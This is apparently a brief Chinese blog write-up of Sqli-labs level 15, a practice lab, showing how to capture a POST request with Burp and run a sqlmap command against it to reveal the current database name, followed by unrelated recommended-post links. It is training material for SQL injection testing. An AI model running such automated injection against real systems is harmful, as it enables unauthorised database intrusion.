Sqli-labs靶场第15关详解[Sqli-labs-less-15]自动化注入-SQLmap工具注入

Sqli-labs-Less-15
#自动化注入-SQLmap工具注入
SQLmap用户手册:文档介绍 - sqlmap 用户手册

由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件

复制代码
python sqlmap.py -r data.txt -current-db

爆出当前数据库名称

成功管理用漏洞!!!

相关推荐
看浪的路人1 分钟前
第3讲:手写第一个 MCP Server(Python SDK)
jvm·数据库·oracle
鹿鸣天涯25 分钟前
CISP认证学习笔记
安全·cisp
大眼、不聚光41 分钟前
5.mysql--主从同步安装部署
数据库·mysql
Yan_chen6661 小时前
SQL-LABS_Less18-20实战攻略
数据库·sql·web安全·网络安全
oradh1 小时前
Oracle RAC OCR维护操作总结
数据库·oracle·ocr·rac ocr维护·ocr维护·vote disk
snow@li2 小时前
HikariCP:高性能数据库连接池全景深入梳理
java·数据库
一个天蝎座的程序猿3 小时前
传统数据库迁金仓KES,空值问题差点让财务报表翻车
数据库
wWYy.3 小时前
Mysql:索引下推
数据库·mysql
Lust Dusk4 小时前
记一次Linux应急响应题目解析
linux·运维·服务器·网络·安全·网络安全
风123456789~4 小时前
【Oracle专栏】ORA-02069: global_names 参数
数据库·oracle